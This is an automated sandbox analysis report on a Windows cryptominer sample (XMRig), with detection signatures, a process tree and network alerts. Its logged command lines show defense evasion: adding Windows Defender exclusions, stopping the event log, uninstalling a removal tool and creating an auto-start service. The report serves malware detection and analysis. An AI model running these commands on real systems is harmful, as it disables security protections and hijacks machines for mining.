Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1584229
MD5:a03484846e3418ffa2ab8aec97a03e88
SHA1:54c62c97db8b0234eeb7a03d66b73f9d1dc22614
SHA256:6932616523c8080fd908d4b776f416a4d32653e657c2cbe75a42cdc0a8b5c4d1
Tags:CoinMinerexex64user-jstrosch
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A03484846E3418FFA2AB8AEC97A03E88)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5068 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6664 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 5600 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3304 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3876 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 616 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6768 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7120 cmdline: C:\Windows\system32\sc.exe delete "LightService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1476 cmdline: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7156 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7108 cmdline: C:\Windows\system32\sc.exe start "LightService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • driver.exe (PID: 7064 cmdline: C:\ProgramData\IGaming\driver.exe MD5: A03484846E3418FFA2AB8AEC97A03E88)
    • powershell.exe (PID: 1784 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5988 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3276 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5084 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1436 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5340 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7120 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 2876 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 528 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: dialer.exe PID: 528JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: dialer.exe PID: 528MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x29e79:$a1: mining.set_target
        • 0x26622:$a2: XMRIG_HOSTNAME
        • 0x2739a:$a3: Usage: xmrig [OPTIONS]
        • 0x26603:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        45.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          45.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          45.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          45.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5600, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe
          Sigma detected: Communication To Uncommon Destination Ports
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 141.94.96.144, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\dialer.exe, Initiated: true, ProcessId: 528, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6768, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", ProcessId: 1476, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7156, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-04T22:58:13.875308+010020479282Crypto Currency Mining Activity Detected192.168.2.5596741.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-04T22:58:02.999130+010020510042Crypto Currency Mining Activity Detected192.168.2.55708983.217.209.23580TCP
          2025-01-04T22:58:19.921055+010020510042Crypto Currency Mining Activity Detected192.168.2.54970583.217.209.23580TCP
          2025-01-04T22:59:18.545663+010020510042Crypto Currency Mining Activity Detected192.168.2.55708783.217.209.23580TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-04T22:58:02.999130+010028269302Crypto Currency Mining Activity Detected192.168.2.549704141.94.96.1448080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\IGaming\driver.exeReversingLabs: Detection: 81%
          Multi AV Scanner detection for submitted file
          Source: file.exeVirustotal: Detection: 80%Perma Link
          Source: file.exeReversingLabs: Detection: 81%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTR
          Detected Stratum mining protocol
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.144:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4335mezgwwsmbw161uqp6waqyxztrvxwsbpkzpxtxxah4mtoxxbierhgbab8xhdzaemkwwvnp49wwk5ribj37ak2azkaekr","pass":"xc","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Found strings related to Crypto-Mining
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exeString found in binary or memory: cryptonight-monerov7
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
